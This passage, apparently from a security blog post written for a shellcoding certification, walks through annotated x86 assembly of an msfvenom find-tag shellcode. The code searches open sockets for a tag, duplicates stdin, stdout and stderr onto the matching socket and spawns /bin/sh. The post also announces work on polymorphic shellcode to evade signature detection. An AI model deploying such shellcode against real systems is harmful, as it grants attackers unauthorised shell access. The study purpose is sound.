&#8220;SLAE&#8221; matches with our buffer pointed at an address to store the recevied bytes for the receive syscall (*0xbff23c) as seen in Fig (1). <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"784\" height=\"852\" src=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-2.jpg\" alt=\"\" class=\"wp-image-169\" srcset=\"https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-2.jpg 784w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-2-276x300.jpg 276w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-2-768x835.jpg 768w, https:\/\/badbit.vc\/wp-content\/uploads\/2020\/08\/peda3-2-300x326.jpg 300w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/figure>\n\n\n\n<p>The disassembly is explained below:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>inc_socket:\n\tinc    WORD PTR &#91;ecx]   ; EBX = 0xa01\n\tpush   0x66\t\t; Pushing 102 on the stack\n\tpop    eax\t\t; Popping the value in EAX. EAX = 102 (socketcall)                                                                                                    \n\tint    0x80\t\t; Call to syscall Socketcall (EBX = 10 = sys_recv)\n\tcmp    DWORD PTR &#91;esi],0x45414c53 ; Comparing \"EALS\" with the buffer\n\tjne    inc_socket                ; Jump to label inc_socket if tag not found\n; If tag found, store sockfd and pass it to dup2 calls\npop    edi \t    ; If tag found, pop (socket file descriptor) in EDI \nmov    ebx,edi      ; Move the (socket file descriptor) in EBX to execute dup2 syscall\npush   0x2 \t    ; Pushing 2 on top of the stack as a start point of dup2 iterator\npop    ecx \t; Popping 2 in ECX\ndup2_iterator:\n\tpush   0x3f\t\t; Pushing 63 (dup2 syscall) on the stack\n\tpop    eax\t\t; Loading 63 in EAX for syscall invocation\n\tint    0x80\t\t; Calling syscall dup2\n\tdec    ecx\t\t; Decrementing ECX. ECX = 1\n\tjns    dup2_iterator\t; Jump to label until we hit signed flag (-1)\n; Execve syscall (spawning shell)\npush   0xb\t\t; Pushing 11 on the stack (execve syscall)\npop    eax\t\t; Popping 11 in EAX. EAX = 11\ncdq    \t\t\t; Clearing out EDX register\npush   edx\t\t; Pushing null on the stack\npush   0x68732f2f\t; Pushing \"\/\/sh\" on the stack (reverse little endian)\npush   0x6e69622f\t; Pushing \"\/bin\" on the stack (reverse little endian)\nmov    ebx,esp\t  ; Moving stack pointer (\/\/bin\/sh NULL) in EBX\npush   edx\t\t; Pushing EDX (Null) on the stack\npush   ebx\t\t; Pushing EBX (Null terminated binary to execute)\nmov    ecx,esp      ; Moving stack pointer to ECX (\/\/bin\/sh NULL)\nint    0x80\t\t; Calling syscall execve<\/code><\/pre>\n\n\n\n<p>Once the bytes have been matched, as seen above, the control will pass to executing dup2 calls iterating stdin, stdout and stderror and lastly spawning a shell using execve syscall.<\/p>\n\n\n\n<p>To conclude, this shellcode will search for existing socket connections on the system and attempt to match the user-supplied flag until a match is found. Once the flag is found, it will use the socket file descriptor of the found socket and use the same to spawn a shell. Amazing!<\/p>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:<br><a href=\"http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/\">http:\/\/securitytube-training.com\/online-courses\/securitytube-linux-assembly-expert\/<\/a><\/p>\n\n\n\n<p>Student ID: PA-14690<\/p>\n\n\n\n<p>In the <a href=\"https:\/\/badbit.vc\/index.php\/2020\/08\/28\/polymorphic-shellcode\/\">next blog post<\/a>, we will take three shellcodes uplaoded by professional on <a rel=\"noreferrer noopener\" href=\"http:\/\/shell-storm.org\/shellcode\/\" target=\"_blank\">shell-storm<\/a> and make a Polymorphic version of the same to beat signature matching.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will analyze shellcodes created from msfvenom. We will focus on Linux &#8211; x86 as the target OS and architecture.Let&#8217;s begin by listing all the available shellcodes for Linux x86 architecture. Shellcodes to be analyzed: # Name Description 1 Linux\/x86\/exec Execute an arbitrary command 2 linux\/x86\/adduser Create a new user with&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[7,5,8,6],"class_list":["post-120","post","type-post","status-publish","format-standard","hentry","category-shellcoding","category-slae-x86","tag-linux","tag-shellcode","tag-slae","tag-x86"],"_links":{"self":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/comments?post=120"}],"version-history":[{"count":39,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/120\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/posts\/120\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/media?parent=120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/categories?post=120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/badbit.vc\/index.php\/wp-json\/wp\/v2\/tags?post=120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}